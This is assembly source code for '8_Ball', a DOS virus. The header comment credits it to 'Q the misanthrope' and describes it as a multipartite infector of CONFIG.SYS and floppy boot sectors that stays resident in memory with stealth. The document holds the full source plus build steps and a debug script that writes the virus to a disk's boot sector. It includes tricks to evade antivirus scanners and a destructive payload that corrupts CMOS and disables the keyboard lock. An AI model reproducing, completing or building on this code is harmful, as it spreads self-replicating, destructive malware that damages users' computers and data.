designed by "Q" the misanthrope.
comment *
8_Ball is a multipartite momentarilly video resident C:\CONFIG.SYS infector
that creates randomly named INSTALL= programs and is an HMA stealth memory
resident floppy boot sector infector. Virus scanners will not be able to
scan for this virus because it does not infect executable files. The payload
is an anti-debug routine that will blow the CMOS and still go memory resident
if debugged. It also will disable the keyboard key lock. It is an
improvement over Q_Ball. Also uses the PKLITE header confuser for TBAV and
AVP.
Example CONFIG.SYS:
BUFFERS=17
FILES=30
INSTALL=AOAN.MCO
tasm 8_ball /m2
tlink 8_ball
exe2bin 8_ball.exe 8_ball.com
format a:/q/u
debug 8_ball.com
l 300 0 0 1
w 100 0 0 1
w 300 0 20 1
m 11c,2fe 100
rcx
1e2
w
q
*
.286
qseg segment byte public 'CODE'
assume cs:qseg, es:qseg, ss:nothing, ds:qseg
top: jmp short install
db 90h
db 'MSDOS5.0'
dw 512
db 1
dw 1
db 2
dw 224
dw 2880
db 0F0h
dw 9
dw 18
dw 2
com_install proc near
db "PK"
mov ax, 3506h
mov dx, next_part-com_install+0100h
int 21h
mov ah, 25h
int 21h
db 08dh, 0d3h
end_it: push es
pop ds
int 21h
int 20h
com_install endp
install proc near
push cs
mov si, bx
push bx
push cs
cld
pop ds
mov es, bx
cmp word ptr ds:[0449h], 07h
je monochrome
push 0b800h
pop es
cmp word ptr es:[si+negative_1-top+01h], -1
monochrome: push es
push si
mov cx, offset previous_hook
pop di
push si
push cx
rep movsb
pop cx
pop si
call return_far
rep movsb
mov si, 1ah*04h
je already_res
movsw
movsw
mov word ptr ds:[si-02h], cs
mov word ptr ds:[si-04h], offset first_hook+7e00h-02h
already_res: push ds
pop es
re_get_boot: mov ax, 0201h
call set_cx_dx
return_far: retf
install endp
next_part proc near
pop dx
pop dx
mov dx,bx
pusha
negative_1: mov di, -1
push es
push ds
mov ax, 3501h
int 21h
cmp byte ptr es:[bx], 00h
org $-1
iret
mov al, 2eh
je go_mem_res
out 70h, ax
next_part endp
go_mem_res proc near
mov ax, 3540h
mov si, 0100h
int 21h
mov word ptr ds:[previous_hook-com_install+0100h], bx
mov word ptr ds:[previous_hook-com_install+0102h], es
mov ax, es
inc ax
mov ax, 4a02h
jz get_out
mov bx, 0200h
int 2fh
inc di
jz get_out
lea cx, word ptr ds:[si]
rep movsw
push es
lea dx, word ptr ds:[di+interrupt_40-com_install-0200h]
mov ax, 2540h
pop ds
int 21h
mov al,60h
out 64h,al
get_status: in al,64h
test al,02h
loopnz get_status
mov al,4bh
out 60h,al
get_out: pop ds
pop es
popa
popf
jmp end_it
go_mem_res endp
install_name db 'INSTALL='
file_name db 'C:\'
db 00h
dot equ $+3
crlf equ $+7
config_line db "c:\config.sys",00
set_cx_dx proc near
mov bp, word ptr ds:[bx+11h]
shr bp, 04h
mov cx, word ptr ds:[bx+16h]
shl cx, 01h
add cx, bp
inc cx
sub cx, word ptr ds:[bx+18h]
mov dh, 01h
int 40h
retn
set_cx_dx endp
v_name db "8_Ball -=Q=-"
interrupt_21 proc near
pushf
pusha
push ds
push cs
pop ds
cmp ah, 4bh
je set_21_back
sub cx, cx
mov ax, 4301h
mov dx, offset config_line+7e00h-02h
int 18h
mov dl, low(offset file_name+7e00h-02h)
mov ah, 5ah
jc keep_trying
int 18h
mov bh, 3eh
xchg ax, bx
int 18h
mov ah, 41h
int 18h
mov cl, 05h
mov ax, 5b2eh
mov byte ptr ds:[dot+7e00h-02h], al
int 18h
mov bh, 40h
xchg ax, bx
mov dx, offset com_install+7c00h
mov ch, 02h
int 18h
mov ah, 3eh
int 18h
mov dl, low(offset config_line+7c00h)
mov ax, 3d42h
int 18h
xchg ax, bx
mov ax, 4202h
cwd
sub cx, cx
int 18h
mov word ptr ds:[crlf+7e00h-02h], 0a0dh
mov ah, 40h
mov dx, offset install_name+7e00h-02h
mov cl, low(crlf-install_name+02h)
int 18h
mov ah, 3eh
int 18h
set_21_back: lds dx, dword ptr ds:[previous_hook+7c00h]
mov ax, 2521h
int 18h
keep_trying: jmp pop_ds_and_all
interrupt_21 endp
next_line proc near
pop ax
add ax, -(return_point-com_install)
xchg ax, si
push ds
push es
pop ds
cmp word ptr ds:[bx+negative_1-top+01h], -1
je get_old_bs
mov ax, 0301h
pusha
call set_cx_dx
cld
mov cx, previous_hook-com_install
lea di, word ptr ds:[bx+com_install-top]
rep movs byte ptr es:[di], cs:[si]
mov word ptr ds:[bx], 0000h
org $-2
jmp $(install-top)
popa
int 40h
get_old_bs: push cs
call re_get_boot
pop ds
popa
popf
return_far_2: retf 02h
next_line endp
interrupt_40 proc near
cmp cx, 0001h
jne jne_far_jmp
cmp ah, 02h
jne jne_far_jmp
cmp dh, ch
jne_far_jmp: jne far_jmp
pushf
push cs
call far_jmp
jc return_far_2
pushf
pusha
call next_line
return_point label byte
interrupt_40 endp
org 001c2h
first_hook proc near
pushf
pusha
mov ax, 1200h
push ds
push es
cwd
int 2fh
inc al
mov ds, dx
mov si, 21h*04h
mov di, offset previous_hook+7c00h
jnz pop_it
les bx, dword ptr cs:[previous_hook+7e00h-02h]
mov ds:[si-((21h-1ah)*04h)+2], es
mov ds:[si-((21h-1ah)*04h)], bx
les bx,dword ptr ds:[si]
mov ds:[si-((21h-18h)*04h)+2], es
push cs
cld
mov ds:[si-((21h-18h)*04h)], bx
pop es
movsw
movsw
mov word ptr ds:[si-04h], offset interrupt_21+7c00h
mov word ptr ds:[si-02h], cs
pop_it: pop es
pop_ds_and_all: pop ds
popa
popf
first_hook endp
org 001fch
far_jmp proc near
sti
db 0eah
previous_hook: label double
far_jmp endp
boot_signature dw 0aa55h
qseg ends
end